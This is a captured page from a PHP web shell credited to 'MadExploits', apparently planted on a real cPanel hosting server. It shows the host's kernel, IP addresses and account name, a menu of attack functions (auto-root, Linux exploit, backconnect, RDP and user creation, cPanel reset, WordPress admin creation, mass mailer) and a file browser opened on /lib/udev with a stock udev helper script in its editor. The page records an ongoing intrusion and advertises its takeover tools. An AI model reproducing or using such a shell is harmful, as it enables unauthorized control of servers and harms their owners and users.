Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.191
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
udev /
[ HOME SHELL ]
Name
Size
Permission
Action
devices
[ DIR ]
drwxr-xr-x
keymaps
[ DIR ]
drwxr-xr-x
rules.d
[ DIR ]
drwxr-xr-x
ata_id
30.02
KB
-rwxr-xr-x
cdrom_id
38.02
KB
-rwxr-xr-x
collect
14.03
KB
-rwxr-xr-x
console_check
7.3
KB
-rwxr-xr-x
console_init
11.78
KB
-rwxr-xr-x
create_floppy_devices
50.24
KB
-rwxr-xr-x
edd_id
22.02
KB
-rwxr-xr-x
findkeyboards
1.75
KB
-rwxr-xr-x
firmware.sh
745
B
-rwxr-xr-x
fstab_import
22.02
KB
-rwxr-xr-x
fw_unit_symlinks.sh
686
B
-rwxr-xr-x
hid2hci
42.03
KB
-rwxr-xr-x
keyboard-force-release.sh
502
B
-rwxr-xr-x
keymap
66.02
KB
-rwxr-xr-x
modem-modeswitch
22.4
KB
-rwxr-xr-x
mpath-iosched.sh
754
B
-rwxr-xr-x
path_id
42.03
KB
-rwxr-xr-x
pci-db
38.03
KB
-rwxr-xr-x
pcmcia-check-broken-cis
10.75
KB
-rwxr-xr-x
pcmcia-socket-startup
40.19
KB
-rwxr-xr-x
rename_device
9.52
KB
-rwxr-xr-x
rule_generator.functions
2.33
KB
-rw-r--r--
sas_path_id
38.03
KB
-rwxr-xr-x
scsi_id
34.55
KB
-rwxr-xr-x
tuned-mpath-iosched
953
B
-rwxr-xr-x
tuned-request-ktune-restart
193
B
-rwxr-xr-x
udev-acl
46.03
KB
-rwxr-xr-x
udev-kvm-check
1.09
KB
-rwxr-xr-x
usb-db
38.03
KB
-rwxr-xr-x
usb_id
46.05
KB
-rwxr-xr-x
v4l_id
10.02
KB
-rwxr-xr-x
write_cd_rules
2.64
KB
-rwxr-xr-x
write_net_rules
4.63
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rule_generator.functions
# functions used by the udev rule generator # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation version 2 of the License. PATH='/sbin:/bin' # Read a single line from file $1 in the $DEVPATH directory. # The function must not return an error even if the file does not exist. sysread() { local file="$1" [ -e "/sys$DEVPATH/$file" ] || return 0 local value read value < "/sys$DEVPATH/$file" || return 0 echo "$value" } sysreadlink() { local file="$1" [ -e "/sys$DEVPATH/$file" ] || return 0 readlink -f /sys$DEVPATH/$file 2> /dev/null || true } # Return true if a directory is writeable. writeable() { if ln -s test-link $1/.is-writeable 2> /dev/null; then rm -f $1/.is-writeable return 0 else return 1 fi } # Create a lock file for the current rules file. lock_rules_file() { [ -e /dev/.udev/ ] || return 0 RULES_LOCK="/dev/.udev/.lock-${RULES_FILE##*/}" retry=30 while ! mkdir $RULES_LOCK 2> /dev/null; do if [ $retry -eq 0 ]; then echo "Cannot lock $RULES_FILE!" >&2 exit 2 fi sleep 1 retry=$(($retry - 1)) done } unlock_rules_file() { [ "$RULES_LOCK" ] || return 0 rmdir $RULES_LOCK || true } # Choose the real rules file if it is writeable or a temporary file if not. # Both files should be checked later when looking for existing rules. choose_rules_file() { local tmp_rules_file="/dev/.udev/tmp-rules--${RULES_FILE##*/}" [ -e "$RULES_FILE" -o -e "$tmp_rules_file" ] || PRINT_HEADER=1 if writeable ${RULES_FILE%/*}; then RO_RULES_FILE='/dev/null' else RO_RULES_FILE=$RULES_FILE RULES_FILE=$tmp_rules_file fi } # Return the name of the first free device. raw_find_next_available() { local links="$*" local basename=${links%%[ 0-9]*} local max=-1 for name in $links; do local num=${name#$basename} [ "$num" ] || num=0 [ $num -gt $max ] && max=$num done local max=$(($max + 1)) # "name0" actually is just "name" [ $max -eq 0 ] && return echo "$max" } # Find all rules matching a key (with action) and a pattern. find_all_rules() { local key="$1" local linkre="$2" local match="$3" local search='.*[[:space:],]'"$key"'"('"$linkre"')".*' echo $(sed -n -r -e 's/^#.*//' -e "${match}s/${search}/\1/p" \ $RO_RULES_FILE \ $([ -e $RULES_FILE ] && echo $RULES_FILE) \ 2>/dev/null) }
Close